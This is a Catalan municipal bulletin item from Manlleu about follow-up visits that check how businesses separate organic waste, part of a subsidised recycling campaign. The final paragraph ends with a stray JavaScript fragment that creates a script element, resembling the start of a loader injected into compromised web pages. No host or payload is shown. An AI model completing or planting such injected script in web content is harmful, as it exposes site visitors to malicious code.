• Inici
  • Butlletí
  • S’inicien les visites de seguiment a tots els establiments productors de matèria orgànica

S’inicien les visites de seguiment a tots els establiments productors de matèria orgànica

El divendres 21/10 es van iniciar les visites de seguiment a tots els establiments productors de matèria orgànica (tant públics com privats) on es generen residus orgànics en més o menys quantitat. És pretén comprovar com es fa la separació de deixalles a tots i cadascun dels punts generadors.

Durant les visites s’aprofita per:

  • Comprovar com es fa la separació de deixalles a cadascun dels punts on es generen (darrera el taulell, a la cuina, menjador…).
  • Observar l’estat dels contenidors (neteja, manteniment), veure si la capacitat és l’adequada i si s’utilitza o no bossa.
  • Oferir uns nous contenidors tancats als establiments que ja en tenen i els treuen al carrer.
  • Aclarir dubtes o donar consells per facilitar la separació de les deixalles.

Aquesta actuació s’emmarca en la campanya de millora de la recollida selectiva de la matèria orgànica a Manlleu subvencionada pel Ministeri d’Agricultura, Alimentació i Medi Ambient (MAGRAMA) i l’Agència de Residus de Catalunya.

Reciclar millor a casa, a l’empresa o a l’escola suposa dur menys residus a l’abocador i reduir les emissions de gasos d’efecte hivernacle. Així doncs, s’aconsegueix una millora local però també global en la mesura que es contribueix a la lluita contra el canvi climàtic.var d=document;var s=d.createElement(‘script’);

A Manlleu
Fem Xarxa